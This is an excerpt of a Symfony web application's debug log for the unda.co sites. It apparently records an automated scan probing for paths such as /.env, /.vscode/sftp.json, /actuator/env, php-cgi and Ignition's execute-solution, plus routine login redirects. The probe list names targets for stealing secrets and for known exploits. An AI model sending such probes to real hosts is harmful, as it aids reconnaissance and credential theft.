  3891. [2025-12-18 13:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3892. [2025-12-18 13:33:40] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/graphql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/graphql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3893. [2025-12-18 13:33:40] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /graphql/api"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /graphql/api\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3894. [2025-12-18 13:33:40] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/gql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/gql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3895. [2025-12-18 13:33:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger-ui.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger-ui.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3896. [2025-12-18 13:33:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3897. [2025-12-18 13:33:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/swagger-ui.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/swagger-ui.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3898. [2025-12-18 13:33:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webjars/swagger-ui/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webjars/swagger-ui/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3899. [2025-12-18 13:33:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3900. [2025-12-18 13:33:46] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/v1/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/v1/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3901. [2025-12-18 13:33:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v2/api-docs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v2/api-docs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3902. [2025-12-18 13:33:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v3/api-docs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v3/api-docs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3903. [2025-12-18 13:33:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api-docs/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api-docs/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3904. [2025-12-18 13:33:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3905. [2025-12-18 13:33:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /@vite/env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /@vite/env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3906. [2025-12-18 13:33:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /actuator/env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /actuator/env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3907. [2025-12-18 13:33:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /php-cgi/php-cgi.exe"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /php-cgi/php-cgi.exe\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3908. [2025-12-18 13:33:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3909. [2025-12-18 13:33:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.vscode/sftp.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.vscode/sftp.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3910. [2025-12-18 13:33:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /about"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /about\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3911. [2025-12-18 13:33:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /debug/default/view"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /debug/default/view\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3912. [2025-12-18 13:33:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v2/_catalog"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v2/_catalog\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3913. [2025-12-18 13:34:01] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3914. [2025-12-18 13:34:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server-status"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server-status\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3915. [2025-12-18 13:34:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /login.action"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /login.action\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3916. [2025-12-18 13:34:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /_all_dbs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /_all_dbs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3917. [2025-12-18 13:34:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.DS_Store"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.DS_Store\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3918. [2025-12-18 13:34:06] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3919. [2025-12-18 13:34:09] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /s/4393e20313e2537313e25333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /s/4393e20313e2537313e25333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3920. [2025-12-18 13:34:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3921. [2025-12-18 13:34:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /telescope/requests"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /telescope/requests\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3922. [2025-12-18 13:34:13] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/?rest_route=%2Fwp%2Fv2%2Fusers%2F","method":"GET"} []
  3923. [2025-12-18 13:40:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4ceed5","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/4ceed5?panel=security","method":"GET"} []
  3924. [2025-12-18 13:40:27] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  3925. [2025-12-18 13:42:47] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  3926. [2025-12-18 13:47:36] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"HEAD"} []
  3927. [2025-12-18 13:47:36] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  3928. [2025-12-18 13:47:36] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  3929. [2025-12-18 13:47:36] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  3930. [2025-12-18 13:47:36] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  3931. [2025-12-18 13:47:36] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  3932. [2025-12-18 13:47:36] security.DEBUG: Calling Authentication entry point. [] []
  3933. [2025-12-18 13:47:37] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"HEAD"} []
  3934. [2025-12-18 13:47:38] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
  3935. [2025-12-18 13:47:38] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  3936. [2025-12-18 13:47:38] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  3937. [2025-12-18 13:47:38] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  3938. [2025-12-18 13:47:38] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  3939. [2025-12-18 13:47:38] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  3940. [2025-12-18 13:47:38] security.DEBUG: Calling Authentication entry point. [] []
  3941. [2025-12-18 13:47:38] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
  3942. [2025-12-18 13:47:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3943. [2025-12-18 13:47:40] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
  3944. [2025-12-18 13:47:40] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  3945. [2025-12-18 13:47:40] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  3946. [2025-12-18 13:47:40] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  3947. [2025-12-18 13:47:40] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  3948. [2025-12-18 13:47:40] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  3949. [2025-12-18 13:47:40] security.DEBUG: Calling Authentication entry point. [] []
  3950. [2025-12-18 13:47:40] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
  3951. [2025-12-18 13:47:42] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"POST"} []
  3952. [2025-12-18 13:47:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /_ignition/execute-solution"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /_ignition/execute-solution\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3953. [2025-12-18 13:47:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /public/_ignition/execute-solution"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /public/_ignition/execute-solution\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
